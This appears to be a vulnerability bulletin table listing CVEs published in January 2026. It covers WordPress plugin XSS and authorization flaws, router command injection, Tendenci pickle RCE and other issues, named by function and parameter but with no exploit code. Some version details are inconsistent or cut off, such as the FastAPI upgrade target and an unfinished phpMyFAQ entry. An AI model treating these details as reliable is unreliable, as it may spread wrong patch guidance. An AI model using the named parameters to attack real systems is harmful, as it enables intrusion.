| sumatrapdfreader--sumatrapdf | SumatraPDF is a multi-format reader for Windows. All versions contain an off-by-one error in the validation code that only triggers with exactly 2 records, causing an integer underflow in the size calculation. This bug exists in PalmDbReader::GetRecord when opening a crafted Mobi file, resulting in an out-of-bounds heap read that crashes the app. There are no published fixes at the time of publication. | 2026-01-22 | 5.5 | CVE-2026-23951 | https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-hj4w-c5x8-p2hv https://github.com/sumatrapdfreader/sumatrapdf/blob/master/src/PalmDbReader.cpp |
| swift-otel--swift-w3c-trace-context | Swift W3C TraceContext is a Swift implementation of the W3C Trace Context standard, and Swift OTel is an OpenTelemetry Protocol (OTLP) backend for Swift Log, Swift Metrics, and Swift Distributed Tracing. Prior to Swift W3C TraceContext version 1.0.0-beta.5 and Swift OTel version 1.0.4, a denial-of-service vulnerability due to improper input validation allows a remote attacker to crash the service via a malformed HTTP header. This allows crashing the process with data coming from the network when used with, for example, an HTTP server. The most common way of using Swift W3C Trace Context is through Swift OTel. Version 1.0.0-beta.5 of Swift W3C TraceContext and version 1.0.4 of Swift OTel contain a patch for this issue. As a workaround, disable either Swift OTel or the code that extracts the trace information from an incoming header (such as a `TracingMiddleware`). | 2026-01-19 | 5.3 | CVE-2026-23886 | https://github.com/swift-otel/swift-w3c-trace-context/security/advisories/GHSA-mvpq-2v8x-ww6g https://github.com/swift-otel/swift-w3c-trace-context/commit/5da9b143ba6046734de3fa51dafea28290174e4e https://github.com/swift-otel/swift-otel/releases/tag/1.0.4 https://github.com/swift-otel/swift-w3c-trace-context/releases/tag/1.0.0-beta.5 |
| tandubhai--Alchemist Ajax Upload | The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments. | 2026-01-24 | 5.3 | CVE-2025-14629 | https://www.wordfence.com/threat-intel/vulnerabilities/id/865dbcf5-7990-40f3-bb90-3ae359b52c6f?source=cve https://wordpress.org/plugins/alchemist-ajax-upload/ https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/tags/1.1/alchemist_ajax_upload.php#L231 https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/trunk/alchemist_ajax_upload.php#L231 |
| Tapandsign Technologies Software Inc.--Tap&Sign | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tapandsign Technologies Software Inc. Tap&Sign allows Cross-Site Scripting (XSS). This issue affects Tap&Sign: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 4.7 | CVE-2025-2204 | https://www.usom.gov.tr/bildirim/tr-26-0004 |
| teamzt--ZT Captcha | The ZT Captcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to improper nonce validation on the save_ztcpt_captcha_settings action where the nonce check can be bypassed by sending an empty token value. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1075 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9f9d6da5-1598-4df4-8efc-306370446443?source=cve https://plugins.trac.wordpress.org/browser/zt-captcha/trunk/request/CaptchaRequest.php#L37 https://plugins.trac.wordpress.org/browser/zt-captcha/tags/1.0.4/request/CaptchaRequest.php#L37 |
| technical-laohu--mpay | A security vulnerability has been detected in technical-laohu mpay up to 1.2.4. The impacted element is an unknown function of the component QR Code Image Handler. Such manipulation of the argument codeimg leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-19 | 4.7 | CVE-2026-1152 | VDB-341745 (technical-laohu mpay QR Code Image unrestricted upload); CTI Indicators (IOB, IOC, TTP, IOA); Submit #735775 (https://gitee.com/technical-laohu/mpay mpay v1.2.4 Arbitrary file upload vulnerability); https://github.com/bdkuzma/vuln/issues/17 |
| technical-laohu--mpay | A vulnerability was detected in technical-laohu mpay up to 1.2.4. This affects an unknown function. Performing a manipulation results in cross-site request forgery. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-01-19 | 4.3 | CVE-2026-1153 | VDB-341746 (technical-laohu mpay cross-site request forgery); CTI Indicators (IOB, IOC); Submit #735789 (https://gitee.com/technical-laohu/mpay mpay v1.2.4 Cross-Site Request Forgery); https://github.com/bdkuzma/vuln/issues/18 |
| tendenci--tendenci | Tendenci is an open source content management system built for non-profits, associations and cause-based sites. Versions 15.3.11 and below include a critical deserialization vulnerability in the Helpdesk module (which is not enabled by default). This vulnerability allows Remote Code Execution (RCE) by an authenticated user with staff security level due to using Python's pickle module in helpdesk /reports/. The original CVE-2020-14942 was incompletely patched. While ticket_list() was fixed to use safe JSON deserialization, the run_report() function still uses unsafe pickle.loads(). The impact is limited to the permissions of the user running the application, typically www-data, which generally lacks write (except for upload directories) and execute permissions. This issue has been fixed in version 15.3.12. | 2026-01-22 | 6.8 | CVE-2026-23946 | https://github.com/tendenci/tendenci/security/advisories/GHSA-339m-4qw5-j2g3 https://github.com/tendenci/tendenci/issues/867 https://github.com/tendenci/tendenci/commit/23d9fd85ab7654e9c83cfc86cb4175c0bd7a77f1 https://github.com/tendenci/tendenci/commit/2ff0a457614944a1b417081c543ea4c5bb95d636 https://github.com/tendenci/tendenci/commit/63e1b84a5b163466d1d8d811d35e7021a7ca0d0e https://docs.python.org/3/library/pickle.html#restricting-globals https://github.com/advisories/GHSA-jqmc-fxxp-r589 https://github.com/tendenci/tendenci/releases/tag/v15.3.12 |
| themeruby--ThemeRuby Multi Authors Assign Multiple Writers to Posts | The ThemeRuby Multi Authors - Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2026-1097 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca74bb1d-1954-4869-aaa9-bf66600cdf2a?source=cve https://plugins.trac.wordpress.org/browser/themeruby-multi-authors/trunk/includes/class-tma-shortcodes.php#L76 https://plugins.trac.wordpress.org/browser/themeruby-multi-authors/tags/1.0.0/includes/class-tma-shortcodes.php#L76 |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized attachment deletion due to a missing capability check on the `delete_existing_user_photo` function in all versions up to, and including, 3.9.4. This makes it possible for authenticated attackers, with subscriber level access and above, to delete arbitrary attachments on the site. | 2026-01-20 | 5.4 | CVE-2026-0548 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e475e02-494a-4ad0-a83c-d027c3a32989?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/tutor/tags/3.9.4/classes/User.php&new_path=/tutor/tags/3.9.5/classes/User.php |
| theupdateframework--go-tuf | go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, if the TUF repository (or any of its mirrors) returns invalid TUF metadata JSON (valid JSON but not well formed TUF metadata), the client will panic during parsing, causing a denial of service. The panic happens before any signature is validated. This means that a compromised repository/mirror/cache can DoS clients without having access to any signing key. Version 2.3.1 fixes the issue. No known workarounds are available. | 2026-01-22 | 5.9 | CVE-2026-23991 | https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-846p-jg2w-w324 https://github.com/theupdateframework/go-tuf/commit/73345ab6b0eb7e59d525dac17a428f043074cef6 https://github.com/theupdateframework/go-tuf/releases/tag/v2.3.1 |
| theupdateframework--go-tuf | go-tuf is a Go implementation of The Update Framework (TUF). Starting in version 2.0.0 and prior to version 2.3.1, a compromised or misconfigured TUF repository can have the configured value of signature thresholds set to 0, which effectively disables signature verification. This can allow unauthorized modification of TUF metadata files at rest or in transit, as no integrity checks are made. Version 2.3.1 fixes the issue. As a workaround, always make sure that the TUF metadata roles are configured with a threshold of at least 1. | 2026-01-22 | 5.9 | CVE-2026-23992 | https://github.com/theupdateframework/go-tuf/security/advisories/GHSA-fphv-w9fq-2525 https://github.com/theupdateframework/go-tuf/commit/b38d91fdbc69dfe31fe9230d97dafe527ea854a0 |
| thimpress--LearnPress WordPress LMS Plugin for Create and Sell Online Courses | The LearnPress - WordPress LMS Plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.3.2.4 via the get_item_permissions_check function. This makes it possible for unauthenticated attackers to extract sensitive data including user first names and last names. Other information such as social profile links and enrollment is also included. | 2026-01-20 | 5.3 | CVE-2025-14798 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6fb00ce4-aa82-4479-b7f6-79e7bde098c1?source=cve https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/jwt/rest-api/version1/class-lp-rest-users-v1-controller.php#L134 https://plugins.trac.wordpress.org/browser/learnpress/tags/4.3.2.1/inc/jwt/rest-api/version1/class-lp-rest-users-v1-controller.php#L35 |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below allow an authenticated user without the dlattachment permission to download FAQ attachments due to an incomplete permissions check. The presence of a right key is improperly validated as proof of authorization in attachment.php. Additionally, the group and user permission logic contains a flawed conditional expression that may allow unauthorized access. This issue has been fixed in version | 2026-01-24 | 6.5 | CVE-2026-24420 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-7p9h-m7m8-vhhv |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Versions 4.0.16 and below have flawed authorization logic which exposes the /api/setup/backup endpoint to any authenticated user despite their permissions. SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. Non-admin users can trigger a configuration backup and retrieve its path. The endpoint only checks authentication, not authorization, and returns a link to the generated ZIP. This issue is fixed in version 4.0.17. | 2026-01-24 | 6.5 | CVE-2026-24421 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-wm8h-26fv-mg7g |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. In versions 4.0.16 and below, multiple public API endpoints improperly expose sensitive user information due to insufficient access controls. The OpenQuestionController::list() endpoint calls Question::getAll() with showAll=true by default, returning records marked as non-public (isVisible=false) along with user email addresses, with similar exposures present in comment, news, and FAQ APIs. This information disclosure vulnerability could enable attackers to harvest email addresses for phishing campaigns or access content that was explicitly marked as private. This issue has been fixed in version 4.0.17. | 2026-01-24 | 5.3 | CVE-2026-24422 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-j4rc-96xj-gvqc |
| Totolink--LR350 | A vulnerability was identified in Totolink LR350 9.3.5u.6369_B20220309. This issue affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument ip leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2026-01-19 | 6.3 | CVE-2026-1149 | VDB-341742 | Totolink LR350 POST Request cstecgi.cgi setDiagnosisCfg command injection VDB-341742 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735695 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setDiagnosisCfg-2e453a41781f800d9ba9c6da80b55276?source=copy_link https://www.totolink.net/ |
| Totolink--LR350 | A security flaw has been discovered in Totolink LR350 9.3.5u.6369_B20220309. Impacted is the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument command results in command injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. | 2026-01-19 | 6.3 | CVE-2026-1150 | VDB-341743 | Totolink LR350 POST Request cstecgi.cgi setTracerouteCfg command injection VDB-341743 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735696 | TOTOLINK LR350 LR350 V9.3.5u.6369_B20220309 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setTracerouteCfg-2e453a41781f803494e3e4161a393487?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A weakness has been identified in Totolink NR1800X 9.1.0u.6279_B20210910. This vulnerability affects the function setWanCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. This manipulation of the argument Hostname causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-22 | 6.3 | CVE-2026-1326 | VDB-342302 | Totolink NR1800X POST Request cstecgi.cgi setWanCfg command injection VDB-342302 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735787 | TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setWanCfg-2e453a41781f80b390f3e1ce0d9dd5b9?source=copy_link https://www.totolink.net/ |
| Totolink--NR1800X | A security vulnerability has been detected in Totolink NR1800X 9.1.0u.6279_B20210910. This issue affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. Such manipulation of the argument command leads to command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2026-01-22 | 6.3 | CVE-2026-1327 | VDB-342303 | Totolink NR1800X POST Request cstecgi.cgi setTracerouteCfg command injection VDB-342303 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735790 | TOTOLINK NR1800X NR1800X_Firmware V9.1.0u.6279_B20210910 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-NR1800X-setTracerouteCfg-2e453a41781f80df8ef9d32983758502?source=copy_link https://www.totolink.net/ |
| typemill--typemill | Typemill is a flat-file, Markdown-based CMS designed for informational documentation websites. A reflected Cross-Site Scripting (XSS) exists in the login error view template `login.twig` of versions 2.19.1 and below. The `username` value can be echoed back without proper contextual encoding when authentication fails. An attacker can execute script in the login page context. This issue has been fixed in version 2.19.2. | 2026-01-23 | 5.4 | CVE-2026-24127 | https://github.com/typemill/typemill/security/advisories/GHSA-65x4-pjhj-r8wr https://github.com/typemill/typemill/commit/b506acd11e80fb9c8db5fa6c2c8ad73580b4e88c https://github.com/typemill/typemill/releases/tag/v2.19.2 |
| uncannyowl--Uncanny Automator Easy Automation, Integration, Webhooks & Workflow Builder Plugin | The Uncanny Automator - Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automator_discord_user_mapping shortcode in all versions up to, and including, 6.10.0.2 due to insufficient input sanitization and output escaping on the verified_message parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user with a verified Discord account accesses the injected page. | 2026-01-23 | 6.4 | CVE-2025-15522 | https://www.wordfence.com/threat-intel/vulnerabilities/id/41c54e1b-69b9-4594-8f1e-7ef17f120791?source=cve https://wordpress.org/plugins/uncanny-automator https://plugins.trac.wordpress.org/browser/uncanny-automator/tags/6.10.0.2/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php#L128 https://plugins.trac.wordpress.org/changeset/3440408/uncanny-automator/trunk/src/integrations/discord/shortcodes/discord-user-mapping-shortcode.php |
| vektor-inc--VK Google Job Posting Manager | The VK Google Job Posting Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Job Description field in versions up to, and including, 1.2.20 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 6.4 | CVE-2025-12836 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4e0fd492-19ee-430e-a495-99ad28043bf9?source=cve https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L419 https://plugins.trac.wordpress.org/browser/vk-google-job-posting-manager/tags/1.2.20/vk-google-job-posting-manager.php#L468 |
| vintagedaddyo--MyBB Delete Account Plugin | MyBB Delete Account Plugin 1.4 contains a cross-site scripting vulnerability in the account deletion reason input field. Attackers can inject malicious scripts that will execute in the admin interface when viewing delete account reasons. | 2026-01-23 | 6.1 | CVE-2021-47905 | ExploitDB-49500 MyBB Delete Account Plugin Repository VulnCheck Advisory: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting |
| waqasvickey0071--WP Youtube Video Gallery | The WP Youtube Video Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce verification on the wpYTVideoGallerySettingSave() function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2025-14906 | https://www.wordfence.com/threat-intel/vulnerabilities/id/53709d2c-6522-40f0-9dc4-82517d3ee7b2?source=cve https://plugins.trac.wordpress.org/browser/wp-youtube-video-gallery/tags/1.0/admin/admin.php#L444 |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot plugin for WordPress is vulnerable to unauthorized modification or loss of data due to a missing capability check on the 'wedocs_user_documentation_handling_capabilities' function in all versions up to, and including, 2.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit any documentation post. The vulnerability was partially patched in version 2.1.16. | 2026-01-23 | 4.3 | CVE-2025-13921 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c56234f3-7dd6-4dff-887d-5ddbf0cb7d3c?source=cve https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/functions.php#L506 https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/Installer.php#L21 https://plugins.trac.wordpress.org/changeset/3426704/ https://plugins.trac.wordpress.org/changeset/3440068/ |
| wedevs--weMail Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation | The weMail - Email Marketing, Lead Generation, Optin Forms, Email Newsletters, A/B Testing, and Automation plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.0.7. This is due to the plugin's REST API trusting the `x-wemail-user` HTTP header to identify users without verifying the request originates from an authenticated WordPress session. This makes it possible for unauthenticated attackers who know or can guess an admin email (easily enumerable via `/wp-json/wp/v2/users`) to impersonate that user and access the CSV subscriber endpoints, potentially exfiltrating subscriber PII (emails, names, phone numbers) from imported CSV files. | 2026-01-20 | 5.3 | CVE-2025-14348 | https://www.wordfence.com/threat-intel/vulnerabilities/id/59c0caa2-d0c2-472e-83c3-d11ad313720d?source=cve https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Csv.php#L79 https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Csv.php#L85 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3442404%40wemail%2Ftrunk&old=3423372%40wemail%2Ftrunk&sfp_email=&sfph_mail=#file1 |
| wizit--Wizit Gateway for WooCommerce | The Wizit Gateway for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Order Cancellation in all versions up to, and including, 1.2.9. This is due to a lack of authentication and authorization checks in the 'handle_checkout_redirecturl_response' function. This makes it possible for unauthenticated attackers to cancel arbitrary WooCommerce orders by sending a crafted request with a valid order ID. | 2026-01-24 | 5.3 | CVE-2025-14843 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b6926c2c-79d4-477c-a2eb-ba62545f2e2b?source=cve https://plugins.trac.wordpress.org/browser/wizit-gateway-for-woocommerce/tags/1.2.9/class-wizit-gateway.php?marks=1249,1341-1349#L1249 |
| wpchill--Image Photo Gallery Final Tiles Grid | The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple AJAX actions in all versions up to, and including, 3.6.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to view, create, modify, clone, delete, and reassign ownership of galleries created by other users, including administrators. | 2026-01-19 | 5.4 | CVE-2025-15466 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0afcfe15-2d7d-4c96-a408-28f35577a927?source=cve https://plugins.trac.wordpress.org/changeset/3435746/ |
| wpdevteam--NotificationX FOMO, Live Sales Notification, WooCommerce Sales Popup, GDPR, Social Proof, Announcement Banner & Floating Notification Bar | The NotificationX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'regenerate' and 'reset' REST API endpoints in all versions up to, and including, 3.1.11. This makes it possible for authenticated attackers, with Contributor-level access and above, to reset analytics for any NotificationX campaign, regardless of ownership. | 2026-01-20 | 4.3 | CVE-2026-0554 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3cd843b-ab38-45c4-a661-78d4e6db5201?source=cve https://research.cleantalk.org/cve-2026-0554 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3433555%40notificationx&old=3426659%40notificationx&sfp_email=&sfph_mail= |
| wpdirectorykit--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.9 via the wdk_public_action AJAX handler. This makes it possible for unauthenticated attackers to extract email addresses for users with Directory Kit-specific user roles. | 2026-01-24 | 5.3 | CVE-2025-13920 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8905dcc7-d3c8-4ae8-818c-df3e6ed2ad9c?source=cve https://plugins.trac.wordpress.org/changeset/3435482/wpdirectorykit |
| wpdiscover--Timeline Event History | The Timeline Event History plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `id` parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-24 | 6.1 | CVE-2026-1127 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ba779595-2674-4d84-bc41-889ae60bd6a4?source=cve https://plugins.trac.wordpress.org/browser/timeline-event-history/tags/3.2/includes/admin/class-timeline-wp-field-builder.php#L540 |
| wpgmaps--WP Go Maps (formerly WP Google Maps) | The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the processBackgroundAction() function in all versions up to, and including, 10.0.04. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global map engine settings. | 2026-01-24 | 5.3 | CVE-2026-0593 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f0741c1-a5d7-41a4-a739-2cb7cb836509?source=cve https://plugins.trac.wordpress.org/changeset/3439283/wp-google-maps/trunk/includes/class.admin-notices.php |
| Yodinfo--Mini Mouse | Mini Mouse 9.3.0 contains a path traversal vulnerability that allows attackers to access sensitive system directories through the device information endpoint. Attackers can retrieve file lists from system directories like /usr, /etc, and /var by manipulating file path parameters in API requests. | 2026-01-21 | 6.2 | CVE-2021-47849 | ExploitDB-49747 Mini Mouse Apple Store VulnCheck Advisory: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal |
| zainali99--MyBB Trending Widget Plugin | MyBB Trending Widget Plugin 1.2 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through thread titles. Attackers can modify thread titles with script payloads that will execute when other users view the trending widget. | 2026-01-23 | 6.1 | CVE-2018-25132 | ExploitDB-49504 Trending Widget GitHub Repository VulnCheck Advisory: MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting |
| zero1zerouk--Login Page Editor | The Login Page Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing nonce validation on the devotion_loginform_process() AJAX action. This makes it possible for unauthenticated attackers to update the plugin's login page settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-24 | 4.3 | CVE-2026-1088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f428b90d-8830-445d-b1f1-d8f860dae5cf?source=cve https://plugins.trac.wordpress.org/browser/login-page-editor/trunk/class/devotion.core.class.php#L50 https://plugins.trac.wordpress.org/browser/login-page-editor/tags/1.2/class/devotion.core.class.php#L50 |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Athroniaeth--fastapi-api-key | FastAPI Api Key is a backend-agnostic library that provides an API key system. Version 1.1.0 has a timing side-channel vulnerability in verify_key(). The method applied a random delay only on verification failures, allowing an attacker to statistically distinguish valid from invalid API keys by measuring response latencies. With enough repeated requests, an adversary could infer whether a key_id corresponds to a valid key, potentially accelerating brute-force or enumeration attacks. All users relying on verify_key() for API key authentication prior to the fix are affected. Users should upgrade to version 1.1.0 to receive a patch. The patch applies a uniform random delay (min_delay to max_delay) to all responses regardless of outcome, eliminating the timing correlation. Some workarounds are available. Add an application-level fixed delay or random jitter to all authentication responses (success and failure) before the fix is applied and/or use rate limiting to reduce the feasibility of statistical timing attacks. | 2026-01-21 | 3.7 | CVE-2026-23996 | https://github.com/Athroniaeth/fastapi-api-key/security/advisories/GHSA-95c6-p277-p87g https://github.com/Athroniaeth/fastapi-api-key/commit/310b2c5c77305f38c63c0b917539a0344071dfd8 https://github.com/Athroniaeth/fastapi-api-key/releases/tag/1.1.0 |
| backstage--backstage | Backstage is an open framework for building developer portals, and @backstage/backend-defaults provides the default implementations and setup for a standard Backstage backend app. Prior to versions 0.12.2, 0.13.2, 0.14.1, and 0.15.0, the `FetchUrlReader` component, used by the catalog and other plugins to fetch content from URLs, followed HTTP redirects automatically. This allowed an attacker who controls a host listed in `backend.reading.allow` to redirect requests to internal or sensitive URLs that are not on the allowlist, bypassing the URL allowlist security control. This is a Server-Side Request Forgery (SSRF) vulnerability that could allow access to internal resources, but it does not allow attackers to include additional request headers. This vulnerability is fixed in `@backstage/backend-defaults` version 0.12.2, 0.13.2, 0.14.1, and 0.15.0. Users should upgrade to this version or later. Some workarounds are available. Restrict `backend.reading.allow` to only trusted hosts that you control and that do not issue redirects, ensure allowed hosts do not have open redirect vulnerabilities, and/or use network-level controls to block access from Backstage to sensitive internal endpoints. | 2026-01-21 | 3.5 | CVE-2026-24048 | https://github.com/backstage/backstage/security/advisories/GHSA-q2x5-4xjx-c6p9 https://github.com/backstage/backstage/commit/27f9061d24affd1b9212fe0abd476bfc3fbaedcb |
| Beetel--777VR1 | A security flaw has been discovered in Beetel 777VR1 up to 01.00.09/01.00.09_55. This affects an unknown part of the component UART Interface. Performing a manipulation results in information disclosure. The attack may be carried out on the physical device. The attack is considered to have high complexity. It is indicated that the exploitability is difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1407 | VDB-342796 | Beetel 777VR1 UART information disclosure VDB-342796 | CTI Indicators (IOB, IOC, TTP) Submit #736322 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 Cleartext Exposure of Sensitive Credentials in Boot Logs - UART https://gist.github.com/raghav20232023/253c041842f622d9c2cb6ee4111c2227 |
| Beetel--777VR1 | A weakness has been identified in Beetel 777VR1 up to 01.00.09/01.00.09_55. This vulnerability affects unknown code of the component UART Interface. Executing a manipulation can lead to weak password requirements. The physical device can be targeted for the attack. The attack requires a high level of complexity. It is stated that the exploitability is difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1408 | VDB-342797 | Beetel 777VR1 UART weak password VDB-342797 | CTI Indicators (IOB, IOC, TTP) Submit #739384 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 CWE-521 — Weak Password Requirements https://gist.github.com/raghav20232023/9c51cbd91f3798b1c10f3f30fb631633 |
| Beetel--777VR1 | A security vulnerability has been detected in Beetel 777VR1 up to 01.00.09/01.00.09_55. This issue affects some unknown processing of the component UART Interface. The manipulation leads to improper restriction of excessive authentication attempts. It is possible to launch the attack on the physical device. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-25 | 2 | CVE-2026-1409 | VDB-342798 | Beetel 777VR1 UART excessive authentication VDB-342798 | CTI Indicators (IOB, IOC, TTP) Submit #739399 | Beetel Beetel 777VR1 Broadband Router Firmware Version: V01.00.09 / V01.00.09_55 CWE-307 Improper Restriction - Excessive Authentication Attempts https://gist.github.com/raghav20232023/19900b427445adf37f64ae953611bfce |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions 9.5.0.0 through 9.5.1.5, versions 9.6.0.0 through 9.7.1.10, versions 9.8.0.0 through 9.10.1.3, versions starting from 9.11.0.0 and prior to 9.13.0.0, contains a Time-of-check Time-of-use (TOCTOU) race condition vulnerability. A low privileged attacker with adjacent network access could potentially exploit this vulnerability, leading to denial of service. | 2026-01-22 | 3.5 | CVE-2026-22281 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below have a Mass Assignment vulnerability in the settings management functionality due to insufficient input validation. The application's saveSettings() function accepts arbitrary key-value pairs without validating property names against allowed settings. The function uses Record<string, any> as input type and iterates over all entries using Object.entries() without filtering unauthorized properties. Any field sent by the attacker is directly persisted to the database, regardless of whether it corresponds to a legitimate application setting. This issue has been fixed in version 1.7.78. | 2026-01-23 | 2.7 | CVE-2026-24140 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-c938-x24g-fxcx https://github.com/franklioxygen/MyTube/commit/9d737cb373f7af3e5c92d458e2832caf817b6de6 |
